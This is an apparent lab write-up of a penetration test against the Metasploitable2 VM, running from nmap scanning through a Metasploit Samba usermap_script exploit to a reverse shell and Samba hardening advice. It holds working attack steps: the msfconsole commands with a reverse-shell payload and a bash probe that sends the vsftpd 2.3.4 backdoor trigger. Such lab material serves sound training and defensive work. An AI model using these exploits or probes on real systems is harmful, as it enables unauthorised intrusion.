Seif Eldien Ahmad Mohammad

Hands-On Exploitation with Metasploitable2: From Scanning to Mitigation

Intro
During my second internship project I worked through a practical penetration testing workflow using Kali Linux and Metasploitable2. The goal: practice reconnaissance, exploitation, and writing remediation recommendations. Below I document the steps I followed and the lessons learned.

Environment

Attack box: Kali Linux

Target: Metasploitable2 (VM)

1) Recon & Scanning

I started with broad and focused scans using nmap:
sudo nmap -sS -sV -p- -T4 --open -oA scans/target 192.168.x.x
The flags: -sS SYN scan, -sV service/version detection, -p- all 65535 TCP ports, -T4 aggressive timing (acceptable on a lab network), --open report only open ports, -oA write normal, grepable and XML output as scans/target.nmap, .gnmap and .xml (the .xml file is what searchsploit --nmap consumes in the next step).
This revealed a number of services; the ones I focused on were:

  • 21/tcp → vsftpd 2.3.4 (banner only; service was broken/unresponsive)
  • 445/tcp → Samba smbd 3.x

2) Enumeration & Triage

After collecting service/version info I used searchsploit and manual checks:

searchsploit --nmap scans/target.xml
searchsploit vsftpd 2.3.4
searchsploit samba 3.0.20

This gave me candidate exploits to test. vsftpd backdoor (CVE-2011-2523) was on the list, as was the Samba username-map script exploit (CVE-2007-2447).
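As an added example (not from the original post), the script below does by hand what the triage step needs from the scan: it parses the grepable file that -oA scans/target produces (scans/target.gnmap) into one line per open port, and reduces each version banner to a searchsploit query. The sample scan lines inside it are constructed, and the function names are mine. Note what happens with the Samba banner: nmap -sV reports only "Samba smbd 3.X - 4.X", so the query comes out with no version at all; the 3.0.20 used in the searchsploit command above has to come from an SMB-level probe such as Metasploit's auxiliary/scanner/smb/smb_version.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): turn nmap -oG (grepable) output
# into a triage list. Each host is one tab-separated "Host:" line whose
# "Ports:" field holds comma-separated entries of the form
#   port/state/proto/owner/service/rpcinfo/version/
# nmap replaces any "/" inside a field with "|", so splitting on "/" is safe.

# Print "ip port/proto service version" for every open port.
# Reads the files given as arguments, or stdin when none are given.
gnmap_open_ports() {
  awk -F'\t' '
    /^Host:/ && /Ports:/ {
      split($1, h, " "); ip = h[2]
      for (i = 1; i <= NF; i++) if ($i ~ /^Ports:/) ports = substr($i, 8)
      n = split(ports, p, /\/, /)            # entries are separated by "/, "
      for (j = 1; j <= n; j++) {
        split(p[j], f, "/")
        if (f[2] == "open") printf "%s %s/%s %s %s\n", ip, f[1], f[3], f[5], f[7]
      }
    }' "$@"
}

# Reduce a version banner to a searchsploit query: product name plus the first
# dotted-numeric token. A banner with no concrete version ("Samba smbd 3.X - 4.X")
# comes back as the product alone, which flags that a deeper probe is needed.
searchsploit_term() {
  printf '%s\n' "$1" | awk '{
    product = $1; ver = ""
    for (i = 2; i <= NF; i++) if ($i ~ /^[0-9]+\.[0-9]/) { ver = $i; break }
    print (ver == "" ? product : product " " ver)
  }'
}

# Constructed sample in -oG format (not real scan output).
sample_gnmap() {
  printf '# Nmap scan (constructed sample)\n'
  printf 'Host: 192.168.56.101 ()\tStatus: Up\n'
  printf 'Host: 192.168.56.101 ()\tPorts: 21/open/tcp//ftp//vsftpd 2.3.4/, 22/filtered/tcp//ssh///, 445/open/tcp//netbios-ssn//Samba smbd 3.X - 4.X (workgroup: WORKGROUP)/\tIgnored State: closed (997)\n'
}

# Usage on a real scan:
#   gnmap_open_ports scans/target.gnmap | while read -r ip port svc ver; do
#     echo "$ip $port -> searchsploit \"$(searchsploit_term "$ver")\""
#   done
```

Running `sample_gnmap | gnmap_open_ports` yields two rows (the filtered ssh entry is dropped), and `searchsploit_term` turns "vsftpd 2.3.4" into a usable query while the Samba banner collapses to just "Samba".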

3) Exploitation

  • vsftpd (CVE-2011-2523): Attempted with the Metasploit module exploit/unix/ftp/vsftpd_234_backdoor. The nmap banner reported vsftpd 2.3.4, but manual connection attempts timed out and the service was not fully responsive; the exploit did not yield a session.
  • Samba (CVE-2007-2447): Used Metasploit:

    msfconsole
    use exploit/multi/samba/usermap_script
    set RHOSTS 192.168.x.x
    set RPORT 445
    set payload cmd/unix/reverse
    set LHOST <kali-ip>
    set LPORT 4444
    exploit

    This produced a working remote shell.

4) Post-Exploitation

With an interactive shell I validated privileges:

id
uname -a

I documented evidence (screenshots, commands, outputs) and prepared remediation notes.
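The vsftpd attempt in section 3 ended in timeouts rather than a clean "not vulnerable", and those are different findings for the report. As an added example (not from the original post, and not the Metasploit module), here is a bash-only probe that separates the two: it sends the documented CVE-2011-2523 trigger (a ":)" in the FTP username, after which a backdoored build listens on TCP 6200) under a hard timeout and returns a distinct exit code for unreachable, no FTP greeting, triggered-but-closed, and backdoor-open. It needs bash (for /dev/tcp) and coreutils timeout; the function names and arguments are mine.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): probe for the vsftpd 2.3.4
# backdoor, CVE-2011-2523, without Metasploit. The backdoored build opens a
# shell on TCP 6200 once it sees ":)" in the FTP USER value. Needs bash (for
# /dev/tcp) and coreutils timeout. Function names and arguments are mine.

# Return 0 if a TCP connect to HOST PORT succeeds within SECS seconds (default 5).
tcp_open() {
  local host=$1 port=$2 secs=${3:-5}
  timeout "$secs" bash -c 'exec 3<>"/dev/tcp/$0/$1"' "$host" "$port" 2>/dev/null
}

# vsftpd_backdoor_check HOST [FTP_PORT] [SHELL_PORT] [SECS]
# Exit codes:
#   0  shell port opened after the trigger: backdoor present
#   1  FTP port unreachable, or reachable but no 220 greeting: service hung,
#      no conclusion about the backdoor (the case the write-up hit)
#   2  FTP answered, trigger sent, shell port stayed closed: not this backdoor
#   3  shell port already open before the trigger: earlier trigger or another service
vsftpd_backdoor_check() {
  local host=$1 ftp_port=${2:-21} shell_port=${3:-6200} secs=${4:-5}
  tcp_open "$host" "$ftp_port" "$secs" || return 1
  tcp_open "$host" "$shell_port" "$secs" && return 3
  # Wait for the FTP greeting, then send the trigger. The reply to USER does
  # not matter; only the value being parsed by the server does.
  timeout $((secs + 5)) bash -c '
    exec 3<>"/dev/tcp/$0/$1"
    IFS= read -r -t "$2" banner <&3 || exit 9
    case $banner in 220*) ;; *) exit 9 ;; esac
    printf "USER x:)\r\nPASS x\r\n" >&3
    sleep 2' "$host" "$ftp_port" "$secs" 2>/dev/null || return 1
  sleep 1
  tcp_open "$host" "$shell_port" "$secs" && return 0
  return 2
}
```

Usage against the lab target is `vsftpd_backdoor_check 192.168.x.x; echo "exit=$?"`. An exit code of 1 is the "broken/unresponsive" state from the scan notes and should be reported as such; only 0 proves the backdoor, and only 2 is evidence against it.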

5) Mitigation Summary

  • Continuous vulnerability scanning and asset inventory.
  • Patch management — update Samba and other services.
  • Network filtering (block/limit access to ports 445, 21).
  • Disable unused services and guest/anonymous access.
  • Apply least privilege on shares and accounts.
  • Network segmentation and logging/monitoring.
  • Incident response readiness.

Result: Achieved a remote shell on Metasploitable2 via the Samba exploit, documented findings, and produced a mitigation plan. Practically implementing scanning → exploitation → mitigation reinforced how important remediation and detection are after proving an attack path.
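As an added example (not from the original post), here are two smb.conf fragments that make the Samba items in the summary concrete: the single [global] option that CVE-2007-2447 depends on, and a hardened configuration with guest and anonymous access off, the daemon bound to one subnet, and share-level least privilege. The interface, subnet, share and group names are assumptions, and the script path is illustrative.

```ini
# Added example, not the original post's configuration.
# smb.conf comments must be on their own line; Samba does not strip trailing comments.

# --- vulnerable [global]: what usermap_script needs ---
[global]
   workgroup = WORKGROUP
   security = user
   # CVE-2007-2447: an unpatched smbd (fixed in 3.0.25) hands the unsanitised
   # username to this script via a shell, so backticks in the username run as root.
   # The path is illustrative.
   username map script = /etc/samba/scripts/mapusers.sh
   map to guest = Bad User

# --- hardened [global] for the same server ---
[global]
   workgroup = WORKGROUP
   security = user
   # no "username map script" at all; if mapping is needed, use a static
   # "username map = /etc/samba/smbusers" file, which runs no command
   # no anonymous fallback, and reject null sessions outright
   map to guest = Never
   restrict anonymous = 2
   # listen only on the trusted interface and subnet (assumed values)
   interfaces = 10.0.0.5/24
   bind interfaces only = yes
   hosts allow = 10.0.0.0/24 127.0.0.1
   hosts deny = ALL
   # requires a current Samba build (Samba 4.x parameter name); also drops SMB1
   server min protocol = SMB2
   # enough logging for detection to see who connected to what
   log level = 2
   log file = /var/log/samba/log.%m

# --- share with least privilege (assumed names) ---
[projects]
   path = /srv/samba/projects
   guest ok = no
   valid users = @projects
   read only = yes
   write list = @projects-editors
```

After editing, run `testparm` to check the syntax and `smbcontrol all reload-config` (or restart smbd) to apply it; the patch item in the summary still applies, since the hardened [global] reduces exposure but does not fix the vulnerable code path in 3.0.20.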

If anyone wants the full notes or the step-by-step commands, I can share the repo with scripts and example outputs.
